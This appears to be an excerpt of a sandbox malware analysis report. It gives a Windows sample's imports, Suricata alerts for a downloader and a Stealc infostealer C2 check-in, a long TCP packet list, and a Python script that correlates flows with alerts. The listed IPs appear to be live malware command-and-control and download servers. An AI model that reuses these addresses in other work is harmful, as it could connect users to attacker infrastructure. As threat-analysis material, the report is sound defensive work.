RT_GROUP_CURSOR | 0x78f48 | 0x30 | data | - | - | 0.9375
RT_GROUP_CURSOR | 0x7ac30 | 0x30 | data | - | - | 0.9375
RT_GROUP_ICON | 0x6b938 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x6b938 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_GROUP_ICON | 0x72128 | 0x76 | data | Tamil | India | 0.6694915254237288
RT_GROUP_ICON | 0x72128 | 0x76 | data | Tamil | Sri Lanka | 0.6694915254237288
RT_VERSION | 0x7ac60 | 0x250 | data | - | - | 0.543918918918919
DLL | Import
KERNEL32.dll | GlobalMemoryStatus, TlsGetValue, GlobalCompact, CreateProcessW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, IsBadCodePtr, EnumResourceNamesW, GetFileAttributesA, GetTimeFormatW, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, GetDiskFreeSpaceW, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, GetVersionExW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetUnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW
GDI32.dll | GetCharWidth32A
ole32.dll | CoSuspendClassObjects
WINHTTP.dll | WinHttpOpen
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-25T22:37:05.562686+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-25T22:37:06.688285+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP
2024-10-25T22:37:15.321806+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP
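The Suricata alerts above and the per-packet TCP list that follows are two views of the same traffic, and an analyst normally wants them joined: which 4-tuples the sandbox host opened, how many packets went each way, and which alert SIDs fired on each flow. The script below is an added example and is not Joe Sandbox code. Its packet rows are a constructed subset of this report's TCP packet list and its alert rows are the three alerts above; the tab-separated layout and the SANDBOX_HOST constant are assumptions of the example, not the report's own format. It also handles the case visible in this report where an alert (the Stealc check-in on port 49732 to 62.204.41.177) has no matching packets in the rows at hand, and reports it instead of dropping it.

```python
"""Flow reconstruction and alert correlation over a Joe Sandbox-style packet list.

Added example: this is not Joe Sandbox code. The packet and alert rows below are
constructed from values printed in this report (a subset of the TCP packet rows
and the three Suricata alerts); the tab-separated layout is an assumption of
this example, not the report's own format.
"""
from datetime import datetime

SANDBOX_HOST = "192.168.2.4"  # the analysis VM's address as shown in the report

# Constructed sample: timestamp, src port, dst port, src IP, dst IP
PACKET_ROWS = """\
Oct 25, 2024 22:37:04.185242891 CEST\t49730\t443\t192.168.2.4\t104.21.56.70
Oct 25, 2024 22:37:04.185329914 CEST\t443\t49730\t104.21.56.70\t192.168.2.4
Oct 25, 2024 22:37:05.562560081 CEST\t443\t49730\t104.21.56.70\t192.168.2.4
Oct 25, 2024 22:37:05.786231041 CEST\t49731\t80\t192.168.2.4\t176.113.115.37
Oct 25, 2024 22:37:05.791997910 CEST\t80\t49731\t176.113.115.37\t192.168.2.4
Oct 25, 2024 22:37:06.688033104 CEST\t80\t49731\t176.113.115.37\t192.168.2.4
Oct 25, 2024 22:37:06.688285112 CEST\t49731\t80\t192.168.2.4\t176.113.115.37
"""

# Constructed sample: timestamp, SID, signature, severity, src IP, src port, dst IP, dst port
ALERT_ROWS = """\
2024-10-25T22:37:05.562686+0200\t2803274\tETPRO MALWARE Common Downloader Header Pattern UH\t2\t192.168.2.4\t49730\t104.21.56.70\t443
2024-10-25T22:37:06.688285+0200\t2803274\tETPRO MALWARE Common Downloader Header Pattern UH\t2\t192.168.2.4\t49731\t176.113.115.37\t80
2024-10-25T22:37:15.321806+0200\t2044243\tET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in\t1\t192.168.2.4\t49732\t62.204.41.177\t80
"""


def parse_packet_ts(ts):
    """Parse 'Oct 25, 2024 22:37:04.185242891 CEST'. The report prints nanoseconds
    and a zone name; datetime.strptime accepts at most six fractional digits."""
    date, clock, _zone = ts.rsplit(" ", 2)
    hms, frac = clock.split(".")
    return datetime.strptime(f"{date} {hms}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_packets(text):
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("\t")
        packets.append((parse_packet_ts(ts), int(sport), int(dport), sip, dip))
    return packets


def parse_alerts(text):
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, sip, sport, dip, dport = line.split("\t")
        alerts.append({"ts": ts, "sid": int(sid), "signature": sig, "severity": int(sev),
                       "key": (sip, int(sport), dip, int(dport))})
    return alerts


def build_flows(packets):
    """Group packets into flows keyed (client IP, client port, server IP, server port),
    treating the sandbox host as the client so both directions land on one key."""
    flows = {}
    for ts, sport, dport, sip, dip in packets:
        if sip == SANDBOX_HOST:
            key, direction = (sip, sport, dip, dport), "out"
        else:
            key, direction = (dip, dport, sip, sport), "in"
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": ts, "last": ts})
        f[direction] += 1
        f["first"] = min(f["first"], ts)
        f["last"] = max(f["last"], ts)
    return flows


def correlate(flows, alerts):
    """Attach alert SIDs to the flow they fired on. An alert whose 4-tuple has no
    packets in the list is returned separately rather than silently dropped."""
    sids = {key: [] for key in flows}
    unmatched = []
    for a in alerts:
        if a["key"] in sids:
            sids[a["key"]].append(a["sid"])
        else:
            unmatched.append(a)
    return sids, unmatched


def contacted_servers(flows):
    """Server-side IOCs (IP, port) derived from the flows, sorted for reporting."""
    return sorted({(ip, port) for (_, _, ip, port) in flows})


def summarize(packet_text=PACKET_ROWS, alert_text=ALERT_ROWS):
    flows = build_flows(parse_packets(packet_text))
    sids, unmatched = correlate(flows, parse_alerts(alert_text))
    return {
        "flows": {key: dict(f, sids=sids[key],
                            duration_s=(f["last"] - f["first"]).total_seconds())
                  for key, f in flows.items()},
        "unmatched_alerts": unmatched,
        "servers": contacted_servers(flows),
    }


if __name__ == "__main__":
    report = summarize()
    for key, f in report["flows"].items():
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  out={f['out']} in={f['in']} "
              f"duration={f['duration_s']:.3f}s sids={f['sids']}")
    for a in report["unmatched_alerts"]:
        print(f"no packets for alert SID {a['sid']} ({a['signature']}) on {a['key']}")
```

Keying flows on the sandbox host as client is what makes the correlation work: the alert rows are written from the client's perspective (source 192.168.2.4), while the packet list interleaves both directions, so a naive join on (src, sport, dst, dport) would miss every server-to-client packet.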
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 22:37:04.185242891 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:04.185329914 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:04.185421944 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:04.201246023 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:04.201286077 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:04.982352972 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:04.982434988 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.142751932 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.142833948 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.143798113 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.144009113 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.150130033 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.195337057 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.562560081 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.562650919 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.562711954 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.562803030 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.562824011 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.562854052 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.562874079 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.562906027 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.570588112 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.570662022 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 25, 2024 22:37:05.570697069 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.570722103 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 25, 2024 22:37:05.786231041 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:05.791997910 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:05.792120934 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:05.792231083 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:05.797807932 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688033104 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688093901 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688132048 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688168049 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688204050 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688240051 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688270092 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688285112 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688285112 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688285112 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688286066 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688286066 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688286066 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688302040 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688338041 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688374996 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688374996 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688375950 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.688401937 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.688424110 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.694031954 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.694123030 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.694159985 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.694195986 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.694226980 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.694278955 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.694278955 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.694278955 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.694366932 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837243080 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837290049 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837327003 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837363958 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837398052 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837435007 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837470055 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837470055 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837470055 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837470055 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837471008 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837562084 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837722063 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837774992 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837786913 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837810040 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.837846994 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.837869883 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.838131905 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.838148117 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.838162899 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.838191032 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.838222027 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.849575996 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.849638939 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.849653959 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.849670887 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.849699974 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.849704027 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.849723101 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.849751949 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955488920 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955569029 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955605030 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955638885 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955678940 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955708981 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955745935 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955759048 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955780983 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955817938 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.955866098 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955866098 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955866098 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955866098 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955866098 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955867052 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955867052 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.955867052 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.956537008 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.956584930 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.956618071 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.956696033 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.967252016 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.967344999 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.967376947 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.967441082 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.967482090 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:06.967739105 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.967739105 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:06.967740059 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.010560036 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.010615110 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.010653973 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.010660887 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.010662079 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.010732889 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075229883 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075362921 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075380087 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075397015 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075458050 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075458050 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075458050 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075458050 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075562954 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075579882 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075706005 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075721979 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.075814962 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075814962 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075814962 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.075815916 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.085072041 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.085124016 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.085165024 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.085285902 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.085285902 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.085285902 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.125863075 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.125895023 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.125952005 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.125988007 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.127814054 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.127850056 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.127878904 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.127899885 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.127908945 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.127964973 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190164089 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190236092 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190306902 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190363884 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190392017 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190392017 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190392017 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190399885 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190435886 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190464020 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190464020 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190488100 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190529108 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190584898 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190618992 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.190757036 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190757990 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.190757990 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.202498913 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.202553988 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.202593088 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.202697992 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.202698946 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.202698946 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.243827105 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.243879080 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.243938923 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.244036913 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.244036913 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.244038105 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.245572090 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.245618105 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.245647907 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.245656013 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.245670080 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.245716095 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307600975 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307671070 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307715893 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307771921 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307791948 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307791948 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307791948 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307809114 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307845116 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.307864904 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307864904 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.307892084 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:07.308439016 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.308492899 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:07.308532000 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
